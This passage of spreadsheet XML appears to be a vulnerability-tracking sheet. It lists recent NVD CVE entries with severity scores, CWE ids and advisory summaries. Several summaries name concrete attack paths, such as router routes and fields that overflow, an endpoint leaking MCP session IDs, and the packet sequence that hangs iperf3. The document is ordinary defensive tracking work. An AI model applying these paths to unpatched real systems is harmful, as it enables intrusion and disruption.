      <c r="N749" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O749" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P749" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q749" s="5" t="inlineStr"/>
      <c r="R749" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59</t>
        </is>
      </c>
      <c r="S749"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749" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101894</t>
        </is>
      </c>
    </row>
    <row r="750">
      <c r="A750" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B750" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C750" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102268</t>
        </is>
      </c>
      <c r="D750" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E750" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F750" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G750" s="5" t="inlineStr"/>
      <c r="H750" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I750" s="5" t="inlineStr"/>
      <c r="J750" s="5" t="inlineStr">
        <is>
          <t>python, cryptography, go</t>
        </is>
      </c>
      <c r="K750" s="5" t="inlineStr"/>
      <c r="L750" s="5" t="inlineStr"/>
      <c r="M750" s="5" t="inlineStr"/>
      <c r="N750" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O750" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P750" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q750" s="5" t="inlineStr"/>
      <c r="R750" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S750"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750" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102268</t>
        </is>
      </c>
    </row>
    <row r="751">
      <c r="A751" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B751" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C751" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79536</t>
        </is>
      </c>
      <c r="D751" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E751" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F751" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G751" s="5" t="inlineStr"/>
      <c r="H751" s="5" t="inlineStr"/>
      <c r="I751" s="5" t="inlineStr"/>
      <c r="J751" s="5" t="inlineStr"/>
      <c r="K751" s="5" t="inlineStr"/>
      <c r="L751" s="5" t="inlineStr"/>
      <c r="M751" s="5" t="inlineStr"/>
      <c r="N751" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O751" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P751" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q751" s="5" t="inlineStr"/>
      <c r="R751" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S751" s="5" t="inlineStr">
        <is>
          <t>bytebase dbhub v1.2.0 was discovered to contain a SQL injection vulnerability in the /utils/sql-parser.ts component. This vulnerability allows attackers to access sensitive databse information via a crafted SQL statement.</t>
        </is>
      </c>
      <c r="T751" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79536</t>
        </is>
      </c>
    </row>
    <row r="752">
      <c r="A752" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B752" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C752" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79537</t>
        </is>
      </c>
      <c r="D752" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E752" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F752" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G752" s="5" t="inlineStr"/>
      <c r="H752" s="5" t="inlineStr"/>
      <c r="I752" s="5" t="inlineStr"/>
      <c r="J752" s="5" t="inlineStr"/>
      <c r="K752" s="5" t="inlineStr"/>
      <c r="L752" s="5" t="inlineStr"/>
      <c r="M752" s="5" t="inlineStr"/>
      <c r="N752" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O752" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P752" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q752" s="5" t="inlineStr"/>
      <c r="R752" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S752" s="5" t="inlineStr">
        <is>
          <t>metatool-ai MetaMCP through 2.4.22 contains an insecure direct object reference (IDOR) in the MCP transport session dispatch. The session store (getSession in session-lifetime-manager.ts) is keyed only by the client-supplied mcp-session-id header with no owner, namespace, or endpoint binding, and the per-endpoint authorization middleware validates only the URL endpoint's owner, never the session. An attacker who supplies another tenant's session id " obtained without authentication from GET /metamcp/health/sessions, which discloses active session IDs and namespace UUIDs " can list and execute the victim tenant's private MCP tools and exfiltrate their data using the victim's forwarded credentials.</t>
        </is>
      </c>
      <c r="T752" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79537</t>
        </is>
      </c>
    </row>
    <row r="753">
      <c r="A753" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B753" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C753" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97689</t>
        </is>
      </c>
      <c r="D753" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E753" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F753" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G753" s="5" t="inlineStr"/>
      <c r="H753" s="5" t="inlineStr"/>
      <c r="I753" s="5" t="inlineStr"/>
      <c r="J753" s="5" t="inlineStr">
        <is>
          <t>urllib3</t>
        </is>
      </c>
      <c r="K753" s="5" t="inlineStr"/>
      <c r="L753" s="5" t="inlineStr">
        <is>
          <t>pip:urllib3</t>
        </is>
      </c>
      <c r="M753" s="5" t="inlineStr">
        <is>
          <t>2.8.0</t>
        </is>
      </c>
      <c r="N753" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O753" s="5" t="inlineStr"/>
      <c r="P753" s="5" t="inlineStr"/>
      <c r="Q753" s="5" t="inlineStr"/>
      <c r="R753" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S753"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753" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97689</t>
        </is>
      </c>
    </row>
    <row r="754">
      <c r="A754" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B754" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C754" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67993</t>
        </is>
      </c>
      <c r="D754" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E754" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F754" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G754" s="5" t="inlineStr"/>
      <c r="H754" s="5" t="inlineStr"/>
      <c r="I754" s="5" t="inlineStr"/>
      <c r="J754" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K754" s="5" t="inlineStr"/>
      <c r="L754" s="5" t="inlineStr"/>
      <c r="M754" s="5" t="inlineStr"/>
      <c r="N754" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O754" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P754" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q754" s="5" t="inlineStr"/>
      <c r="R754" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S754" s="5" t="inlineStr">
        <is>
          <t>basecamp/upright at commit efe4f2e5254ac6e57e45d2261804cca74dbbca3f contains a login cross-site request forgery issue in the static credentials callback.</t>
        </is>
      </c>
      <c r="T754" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67993</t>
        </is>
      </c>
    </row>
    <row r="755">
      <c r="A755" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B755" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.2 → 8.8)</t>
        </is>
      </c>
      <c r="C755" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71971</t>
        </is>
      </c>
      <c r="D755" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E755" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F755" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G755" s="5" t="inlineStr"/>
      <c r="H755" s="5" t="inlineStr"/>
      <c r="I755" s="5" t="inlineStr"/>
      <c r="J755" s="5" t="inlineStr"/>
      <c r="K755" s="5" t="inlineStr"/>
      <c r="L755" s="5" t="inlineStr"/>
      <c r="M755" s="5" t="inlineStr"/>
      <c r="N755" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O755" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P755" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q755" s="5" t="inlineStr"/>
      <c r="R755" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S755" s="5" t="inlineStr">
        <is>
          <t>U-Boot before 2026.10-rc3 with CONFIG_IP_DEFRAG enabled contains an out-of-bounds write vulnerability in the __net_defragment() function in net/net.c. Remote attackers can send a crafted IP fragment with non-zero offset and More-Fragments flag set during netboot to corrupt adjacent memory and crash the bootloader.</t>
        </is>
      </c>
      <c r="T755" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71971</t>
        </is>
      </c>
    </row>
    <row r="756">
      <c r="A756" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B756" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.2 → 8.8)</t>
        </is>
      </c>
      <c r="C756" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74220</t>
        </is>
      </c>
      <c r="D756" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E756" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F756" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G756" s="5" t="inlineStr"/>
      <c r="H756" s="5" t="inlineStr"/>
      <c r="I756" s="5" t="inlineStr"/>
      <c r="J756" s="5" t="inlineStr"/>
      <c r="K756" s="5" t="inlineStr"/>
      <c r="L756" s="5" t="inlineStr"/>
      <c r="M756" s="5" t="inlineStr"/>
      <c r="N756" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O756" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P756" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q756" s="5" t="inlineStr"/>
      <c r="R756" s="5" t="inlineStr">
        <is>
          <t>CWE-195</t>
        </is>
      </c>
      <c r="S756" s="5" t="inlineStr">
        <is>
          <t>U-Boot before 2026.10-rc5 contains a buffer overflow in nfs_read_reply() function in net/nfs-common.c that allows attackers to corrupt memory by supplying crafted NFS READ reply lengths. A malicious NFS server can exploit signed integer handling to bypass length validation and write far past the destination buffer, crashing the bootloader or corrupting memory.</t>
        </is>
      </c>
      <c r="T756" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74220</t>
        </is>
      </c>
    </row>
    <row r="757">
      <c r="A757" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B757" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.2 → 8.8)</t>
        </is>
      </c>
      <c r="C757" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74221</t>
        </is>
      </c>
      <c r="D757" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E757" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F757" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G757" s="5" t="inlineStr"/>
      <c r="H757" s="5" t="inlineStr"/>
      <c r="I757" s="5" t="inlineStr"/>
      <c r="J757" s="5" t="inlineStr"/>
      <c r="K757" s="5" t="inlineStr"/>
      <c r="L757" s="5" t="inlineStr"/>
      <c r="M757" s="5" t="inlineStr"/>
      <c r="N757" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O757" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P757" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q757" s="5" t="inlineStr"/>
      <c r="R757" s="5" t="inlineStr">
        <is>
          <t>CWE-195</t>
        </is>
      </c>
      <c r="S757" s="5" t="inlineStr">
        <is>
          <t>U-Boot before 2026.10-rc5 contains a buffer overflow in nfs_readlink_reply() function in net/nfs-common.c when processing NFS server responses. A malicious NFS server can send crafted READLINK replies with negative or oversized symlink length values to corrupt memory and crash the bootloader.</t>
        </is>
      </c>
      <c r="T757" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74221</t>
        </is>
      </c>
    </row>
    <row r="758">
      <c r="A758" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B758" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C758" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94953</t>
        </is>
      </c>
      <c r="D758" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E758" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F758" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G758" s="5" t="inlineStr"/>
      <c r="H758" s="5" t="inlineStr"/>
      <c r="I758" s="5" t="inlineStr"/>
      <c r="J758" s="5" t="inlineStr"/>
      <c r="K758" s="5" t="inlineStr"/>
      <c r="L758" s="5" t="inlineStr"/>
      <c r="M758" s="5" t="inlineStr"/>
      <c r="N758" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O758" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P758" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q758" s="5" t="inlineStr"/>
      <c r="R758" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S758" s="5" t="inlineStr">
        <is>
          <t>A stack-based buffer overflow vulnerability exists in the web management interface of TOTOLINK N150RT (NTR150) firmware V3.4.0-B20201030. It is reachable through the route /boafrm/formAjaxSet using the topicurl=setting/setWiFiRepeaterConfig branch and the ApCliWEPKey field.</t>
        </is>
      </c>
      <c r="T758" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94953</t>
        </is>
      </c>
    </row>
    <row r="759">
      <c r="A759" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B759" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C759" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94954</t>
        </is>
      </c>
      <c r="D759" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E759" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F759" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G759" s="5" t="inlineStr"/>
      <c r="H759" s="5" t="inlineStr"/>
      <c r="I759" s="5" t="inlineStr"/>
      <c r="J759" s="5" t="inlineStr"/>
      <c r="K759" s="5" t="inlineStr"/>
      <c r="L759" s="5" t="inlineStr"/>
      <c r="M759" s="5" t="inlineStr"/>
      <c r="N759" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O759" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P759" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q759" s="5" t="inlineStr"/>
      <c r="R759" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S759" s="5" t="inlineStr">
        <is>
          <t>A stack-based buffer overflow vulnerability exists in the web management interface of TOTOLINK N150RT (NTR150) firmware V3.4.0-B20201030. It is reachable through the route /boafrm/formFilter (access-control / URL filter configuration handler) and is triggered by the url request parameter when the addFilterUrl (or addFilterUrlFlag) action flag is set.</t>
        </is>
      </c>
      <c r="T759" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94954</t>
        </is>
      </c>
    </row>
    <row r="760">
      <c r="A760" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B760" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C760" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95362</t>
        </is>
      </c>
      <c r="D760" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E760" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F760" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G760" s="5" t="inlineStr"/>
      <c r="H760" s="5" t="inlineStr"/>
      <c r="I760" s="5" t="inlineStr"/>
      <c r="J760" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K760" s="5" t="inlineStr"/>
      <c r="L760" s="5" t="inlineStr"/>
      <c r="M760" s="5" t="inlineStr"/>
      <c r="N760" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O760" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P760" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q760" s="5" t="inlineStr"/>
      <c r="R760" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S760" s="5" t="inlineStr">
        <is>
          <t>Cross-site request forgery in DevTools in Google Chrome prior to 154.0.8037.57 allowed a remote attacker leveraging social engineering to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T760" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95362</t>
        </is>
      </c>
    </row>
    <row r="761">
      <c r="A761" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B761" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C761" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100700</t>
        </is>
      </c>
      <c r="D761" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E761" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F761" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G761" s="5" t="inlineStr"/>
      <c r="H761" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I761" s="5" t="inlineStr"/>
      <c r="J761" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K761" s="5" t="inlineStr"/>
      <c r="L761" s="5" t="inlineStr"/>
      <c r="M761" s="5" t="inlineStr"/>
      <c r="N761" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O761" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P761" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q761" s="5" t="inlineStr"/>
      <c r="R761" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="S761"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761" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100700</t>
        </is>
      </c>
    </row>
    <row r="762">
      <c r="A762" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B762" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.5 → 8.7)</t>
        </is>
      </c>
      <c r="C762" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102253</t>
        </is>
      </c>
      <c r="D762" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E762" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F762" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G762" s="5" t="inlineStr"/>
      <c r="H762" s="5" t="inlineStr"/>
      <c r="I762" s="5" t="inlineStr"/>
      <c r="J762" s="5" t="inlineStr"/>
      <c r="K762" s="5" t="inlineStr"/>
      <c r="L762" s="5" t="inlineStr"/>
      <c r="M762" s="5" t="inlineStr"/>
      <c r="N762" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O762" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P762" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q762" s="5" t="inlineStr"/>
      <c r="R762" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="S762" s="5" t="inlineStr">
        <is>
          <t>iperf3 versions prior to 3.22 contains a denial of service vulnerability that allows unauthenticated remote attackers to crash-loop the server's UDP receive worker into an unrecoverable infinite loop by sending a single crafted control-channel parameter message followed by one 16-byte UDP datagram. Attackers can permanently pin the affected per-stream receive thread at approximately 100% CPU usage, rendering the server unusable until forcibly killed with SIGKILL, as the process does not respond to normal control-channel closure.</t>
        </is>
      </c>
      <c r="T762" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102253</t>
        </is>
      </c>
    </row>
    <row r="763">
      <c r="A763" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B763" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.5 → 8.7)</t>
        </is>
      </c>
      <c r="C763" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103043</t>
        </is>
      </c>
      <c r="D763" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E763" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F763" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G763" s="5" t="inlineStr"/>
      <c r="H763" s="5" t="inlineStr"/>
      <c r="I763" s="5" t="inlineStr"/>
      <c r="J763" s="5" t="inlineStr">
        <is>
          <t>node.js, express, requests, gin</t>
        </is>
      </c>
      <c r="K763" s="5" t="inlineStr"/>
      <c r="L763" s="5" t="inlineStr"/>
      <c r="M763" s="5" t="inlineStr"/>
      <c r="N763" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O763" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P763" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q763" s="5" t="inlineStr"/>
      <c r="R763" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="S763"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763" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103043</t>
        </is>
      </c>
    </row>
    <row r="764">
      <c r="A764" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B764" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.8 → 8.7)</t>
        </is>
      </c>
      <c r="C764" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61519</t>
        </is>
      </c>
      <c r="D764" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E764" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F764" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G764" s="5" t="inlineStr"/>
      <c r="H764" s="5" t="inlineStr"/>
      <c r="I764" s="5" t="inlineStr"/>
      <c r="J764" s="5" t="inlineStr">
        <is>
          <t>vite</t>
        </is>
      </c>
      <c r="K764" s="5" t="inlineStr"/>
      <c r="L764" s="5" t="inlineStr"/>
      <c r="M764" s="5" t="inlineStr"/>
      <c r="N764" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O764" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P764" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q764" s="5" t="inlineStr"/>
      <c r="R764" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S764"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764" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61519</t>
        </is>
      </c>
    </row>
    <row r="765">
      <c r="A765" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B765" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.9 → 8.6)</t>
        </is>
      </c>
      <c r="C765" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102911</t>
        </is>
      </c>
      <c r="D765" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E765" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F765" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G765" s="5" t="inlineStr"/>
      <c r="H765" s="5" t="inlineStr"/>
      <c r="I765" s="5" t="inlineStr"/>
      <c r="J765" s="5" t="inlineStr"/>
      <c r="K765" s="5" t="inlineStr"/>
      <c r="L765" s="5" t="inlineStr"/>
      <c r="M765" s="5" t="inlineStr"/>
      <c r="N765" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O765" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P765" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q765" s="5" t="inlineStr"/>
      <c r="R765" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S765" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in zosmaai pi-llm-wiki up to 0.11.7. Affected is an unknown function of the file mcp/index.ts of the component wiki_capture_source MCP tool. Executing a manipulation of the argument url can lead to os command injection. The attack can be executed remotely. The exploit has been published and may be used. Upgrading to version 0.11.8 is able to address this issue. This patch is called 360867034e79175b45c8e04a98e4ca712bbaca35. Upgrading the affected component is advised.</t>
        </is>
      </c>
      <c r="T765" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102911</t>
        </is>
      </c>
    </row>
    <row r="766">
      <c r="A766" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B766" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.1 → 8.5)</t>
        </is>
      </c>
      <c r="C766" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102794</t>
        </is>
      </c>
      <c r="D766" s="5" t="n">
